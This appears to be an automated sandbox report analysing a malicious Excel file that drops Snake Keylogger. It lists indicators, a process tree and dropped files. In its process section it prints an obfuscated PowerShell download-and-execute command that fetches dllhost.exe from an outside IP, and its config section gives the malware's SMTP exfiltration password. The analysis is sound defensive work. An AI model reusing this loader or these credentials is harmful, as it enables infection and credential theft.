Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
01-10-2024 12:11
Static task
static1
Behavioral task
behavioral1
Sample
AE11690106202.xls
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
AE11690106202.xls
Resource
win10v2004-20240802-en
General
-
Target
AE11690106202.xls
-
Size
640KB
-
MD5
20e619e98752c941405d8bc0c66242b9
-
SHA1
0320eeb4e91a97d2d78f1ddb196ff09ca7a95da0
-
SHA256
5f7ede06fa8da808f891e29fcfc533fcab3f7e9bc02ad68d0e5b24fe006fcbe5
-
SHA512
1a7f5cb0e1af193d9e6e07b4653648d607c4e931b32be475c0808fdd33a55a1e4257db456f8bda32f69ee09e07ba48248163127b72939eca17619110e997bdc2
-
SSDEEP
12288:3S6nskrDE0NvKwm3HzxoO1e1ic6yWK0VceVnV2EVS7IIM:3S6nrNvIoOcl637rnV2Ey/M
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.kotobagroup.com - Port:
587 - Username:
[email protected] - Password:
Kotoba@2022!
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 4 IoCs
resource yara_rule behavioral1/memory/2980-64-0x00000000000D0000-0x00000000000F6000-memory.dmp family_snakekeylogger behavioral1/memory/2980-70-0x00000000000D0000-0x00000000000F6000-memory.dmp family_snakekeylogger behavioral1/memory/2980-65-0x00000000000D0000-0x00000000000F6000-memory.dmp family_snakekeylogger behavioral1/memory/2980-72-0x00000000000D0000-0x00000000000F6000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 3 IoCs
flow pid Process 10 2804 mshta.exe 11 2804 mshta.exe 13 2452 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 2452 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2936 dllhost.exe -
Loads dropped DLL 1 IoCs
pid Process 2452 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0007000000016d4b-58.dat autoit_exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2936 set thread context of 2980 2936 dllhost.exe 40 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2172 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2452 powershell.exe 2452 powershell.exe 2452 powershell.exe 2980 RegSvcs.exe 2980 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 2936 dllhost.exe 2936 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2452 powershell.exe Token: SeDebugPrivilege 2980 RegSvcs.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2172 EXCEL.EXE 2172 EXCEL.EXE 2172 EXCEL.EXE 2172 EXCEL.EXE 2172 EXCEL.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2804 wrote to memory of 1736 2804 mshta.exe 33 PID 2804 wrote to memory of 1736 2804 mshta.exe 33 PID 2804 wrote to memory of 1736 2804 mshta.exe 33 PID 2804 wrote to memory of 1736 2804 mshta.exe 33 PID 1736 wrote to memory of 2452 1736 cmd.exe 35 PID 1736 wrote to memory of 2452 1736 cmd.exe 35 PID 1736 wrote to memory of 2452 1736 cmd.exe 35 PID 1736 wrote to memory of 2452 1736 cmd.exe 35 PID 2452 wrote to memory of 2336 2452 powershell.exe 36 PID 2452 wrote to memory of 2336 2452 powershell.exe 36 PID 2452 wrote to memory of 2336 2452 powershell.exe 36 PID 2452 wrote to memory of 2336 2452 powershell.exe 36 PID 2336 wrote to memory of 1552 2336 csc.exe 37 PID 2336 wrote to memory of 1552 2336 csc.exe 37 PID 2336 wrote to memory of 1552 2336 csc.exe 37 PID 2336 wrote to memory of 1552 2336 csc.exe 37 PID 2452 wrote to memory of 2936 2452 powershell.exe 39 PID 2452 wrote to memory of 2936 2452 powershell.exe 39 PID 2452 wrote to memory of 2936 2452 powershell.exe 39 PID 2452 wrote to memory of 2936 2452 powershell.exe 39 PID 2936 wrote to memory of 2980 2936 dllhost.exe 40 PID 2936 wrote to memory of 2980 2936 dllhost.exe 40 PID 2936 wrote to memory of 2980 2936 dllhost.exe 40 PID 2936 wrote to memory of 2980 2936 dllhost.exe 40 PID 2936 wrote to memory of 2980 2936 dllhost.exe 40 PID 2936 wrote to memory of 2980 2936 dllhost.exe 40 PID 2936 wrote to memory of 2980 2936 dllhost.exe 40 PID 2936 wrote to memory of 2980 2936 dllhost.exe 40 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\AE11690106202.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2172
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C PoWErShELL -EX ByPASS -NOp -w 1 -C deVicECrEdEntiAlDEPloYMeNT.exe ; iEX($(IEx('[sYStEm.text.encODinG]'+[ChAR]0X3A+[CHAr]58+'UTf8.gEtSTrIng([systEM.ConvERT]'+[chaR]58+[ChAr]0X3A+'fromBasE64strIng('+[ChAR]34+'JDdZOVg2a1NJMVUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVSRGVGaU5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cVloakVseixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTWE9XUEtnLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExSbkZTTSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnd6eGdDeU8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU05DQkxtZik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIktIYmtPb1MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWVzUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlKUnlETnJlRyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN1k5WDZrU0kxVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjkvNzgwL2RsbGhvc3QuZXhlIiwiJGVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJULVNMZUVwKDMpO1NUQVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[Char]34+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoWErShELL -EX ByPASS -NOp -w 1 -C deVicECrEdEntiAlDEPloYMeNT.exe ; iEX($(IEx('[sYStEm.text.encODinG]'+[ChAR]0X3A+[CHAr]58+'UTf8.gEtSTrIng([systEM.ConvERT]'+[chaR]58+[ChAr]0X3A+'fromBasE64strIng('+[ChAR]34+'JDdZOVg2a1NJMVUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVSRGVGaU5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cVloakVseixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTWE9XUEtnLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExSbkZTTSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnd6eGdDeU8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU05DQkxtZik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIktIYmtPb1MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWVzUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlKUnlETnJlRyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN1k5WDZrU0kxVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjkvNzgwL2RsbGhvc3QuZXhlIiwiJGVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJULVNMZUVwKDMpO1NUQVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[Char]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\k7sbogbn.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD7E9.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD7E8.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:1552
-
-
-
C:\Users\Admin\AppData\Roaming\dllhost.exe"C:\Users\Admin\AppData\Roaming\dllhost.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\dllhost.exe"5⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2980
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57fb5fa1534dcf77f2125b2403b30a0ee
SHA1365d96812a69ac0a4611ea4b70a3f306576cc3ea
SHA25633a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f
SHA512a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD583d95c4ebc601b76bbf43d391ae74782
SHA1d0eb5ae0b48034c9577c73c0a8f60c88c154362f
SHA25655f9af2fda30fe01c50ee911f06218ea9103b92a712b9950e361131f9b9963ee
SHA512ba80f89171eebd85aace8bf609fa0804a6fb508155fee4c71439f7b983bef356b0f727f8ffc065fb5c595423b1ebce5a1cc8fec30ea3bedb951d2b19adda9287
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD5175c3b270653835030e075d51e531d2d
SHA1b7cc1faf9f09a3c318654b7cd57cc7d271f795bf
SHA256b8c2a5e2005d72cee96a0f46bd5bd0e18c16c748e2b551aab932ea26b638b3f7
SHA512ab7eae16f4805831d67c50ecfd22d6e2d5d6db1ad094e88014d05c4e26b516bae8822479303c79704f60401ec6a65f84cd6091d64186aa8c7148f5509c7ebf4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6XUZ2JLF\IEnetbookupdation[1].hta
Filesize8KB
MD5c5ceccd555df7698d730dbf80adc5c50
SHA1b1973f00b359aadce3a356c158f1f266f202e046
SHA25619123f85ee5488a249fa8f2260b3c8d75e3cd83ac75e2a4371edd9580e6b37ca
SHA512cdd2f7bb931f7dbd1a6f3a2e4cba96366402ef66be9c7ad70d809e3b09b7a86af662bb86732614b1531701a7e3a2bff5419293e0d210fa7a87bae146f87b0032
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD552b1d9dcc1c484d71a4b0792bd12d219
SHA17d2184c7151d05515944c386c73542e664a65b58
SHA2567fd3fa9ec2007ef19261b81401de2a618f06ef19f3ec35ba65911f22a9cd8563
SHA51241dc82a54bb826ca8e9f5637dd2cd6b64aced9e1d3f15350170a3207d4bdc7ece1470adfe514f87e377af54e731a77bdff1cd05fd30f6bcc36e3f30998ec5325
-
Filesize
3KB
MD5d77fb1ab8a8f4e20553c78e1df7ec052
SHA15a4b4d78c69f83ee41c21ddf723fd29aad7f4621
SHA256883e6a85935e2fcdf991d8778ba23f7686bd40d5d78cefa98cc7cdddb61baec4
SHA5127142a03cfc8d636cb13a5a10aed77f2800afc71ac9711aa92d250ee29a4ad41023c44063dfcf29dab9f04601a53e8baef4e3fa3c8fec6cdc2ec2ed1b07447c45
-
Filesize
7KB
MD53680381b83f26446d04de2c03a5a5f43
SHA179270f87a7b4b1eaf77d08db72adbbab2172802a
SHA256d26060741dab3ff4aeaa6cf1b26859241cddc79d6d574a1afa8a48c773c9ac7a
SHA512f03d379272fd1a79ad3cdd4a88d92dbf6f09d8f9673808f5358a03fde80911b08dcf0f78a38b2e22a5a77fb05b6a2c190be65e1d7eb558da570f0af78631d430
-
Filesize
1008KB
MD546ce226283fb84a52a6a902fc7032363
SHA1c3bb1c73525de62dc7756ad40574ad6c6c148996
SHA2569f3a7c1a4cc7e6e68e610bdce33046edb090a648e362ab8d3df8ba72561e1482
SHA51236ea4f80512c7b20d1c34406b6bdd77f64831c4569d7cb4418d4904dffdb8d33e3b6e4f37fa2b949449c04569bd1f9dc3dd010027de288ab2f8ac9de02d4f34d
-
Filesize
652B
MD5307e1c862712fd27d48076075d91a940
SHA10d2afe5c9c0266d195aec5684da85838db699952
SHA256ebacfdc603fa2a1788bf69995fb5796a7889d190345df8d0cf44536da6271b5c
SHA51292191eb38fa8abc3f03713cfc4fb6a36f9e254c3c653178d94c17573409df2366d85ae9591b652356a957e868f0cd89b85e3f4e092a7642e97646241eab909ac
-
Filesize
485B
MD5526cb8f584c9e67eaad8958503b05f30
SHA12c52fac6e929f46dcb4b0cdbeab72cfb806a2c87
SHA256af9253507cbd12a1875ffc8b02988ef5bccc511c7c77614cb34c5115b42c5b76
SHA5125552f12bb883f18c7901a8d873eb1beaab9aa2e06a213ab476ef5a21b00faa69ab438261b7612c7be0cbd3d9f6086a1861c4f28ab3df41969d227eabbe0d9619
-
Filesize
309B
MD5a2cb988b5f1c9c10cccf05bb4d791cdb
SHA1f37116a04c2f8f3188a16fcf782ea275f61b77e6
SHA2563f999416ae344024d2cdcb6e0a218cdbae11dab93d036249e8d773bb11c88912
SHA5127df0689d7088a7e59f9b29e2aaba6f0f838fef1dac524f47e1e929391dbda4274ec9f27626054feda8a72a535f9a1e0f1676d3d019a51124ffc8e95535c32cc3